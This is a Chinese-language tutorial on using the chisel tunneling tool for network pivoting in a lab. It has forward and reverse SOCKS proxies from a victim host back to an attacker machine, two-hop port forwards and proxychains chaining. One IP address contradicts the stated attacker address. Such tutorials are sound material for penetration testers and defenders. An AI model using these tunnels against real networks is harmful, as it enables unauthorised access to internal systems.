chisel 是一款基於 HTTP 的快速 TCP/UDP 隧道
項目地址:https://github.com/jpillora/chisel/releases
優點:使用 SSH 加密,具有較好的安全性。具有斷開等待和重連機制,具有較好的穩定性(類似的 ew 長時間不操作就會斷開)。Go 語言編寫,支持多平台。單一文件無依賴。
攻擊者(kali): 192.168.6.131
受害者(windows): 192.168.6.129
拓撲如下:
攻擊者(192.168.6.131)<--> 受害者(192.168.6.129,10.1.1.1)< -- > 內部伺服器 (10.1.1.2)
目標訪問: 10.1.1.2
一級代理#
正向連接(socks)
跳板機(受害者)
./chisel server -p 12345
攻擊者
./chisel client 192.168.6.129:12345 socks
socks 代理綁定在了 1080 端口上,本地只要設置 socks5 代理就可以訪問。
反向連接
攻擊者(黑客)
./chisel server -p 12345 --reverse --socks5
跳板機(受害者)
chisel.exe client 192.168.6.128:12345 R:socks
攻擊者(黑客)訪問 10.1.1.2 可以訪問。
二級代理#
訪問特定端口#
kali:
chisel server -p 3333 --reverse
web01:
開啟兩個終端,既要運行 client 也要運行 server
chisel server -p 2222 --reverse
chisel client 192.168.126.132:3333 R:1111:127.0.0.1:5555
web02:
chisel client 192.168.150.128:2222 R:5555:192.168.59.129:80
在 kali 上訪問 127.0.0.1:1111,即可訪問 192.168.59.129 的 80 端口
socks 代理#
kali:
chisel server -p 3333 --reverse
web01:
開啟兩個終端,既要運行 client 也要運行 server
chisel server -p 2222 --reverse --socks5
chisel client 192.168.126.132:3333 R:1111:socks
web02:
chisel client 192.168.150.128:2222 R:5555:socks
proxychains.conf 文件設置代理鏈
socks5 127.0.0.1 1111
socks5 127.0.0.1 5555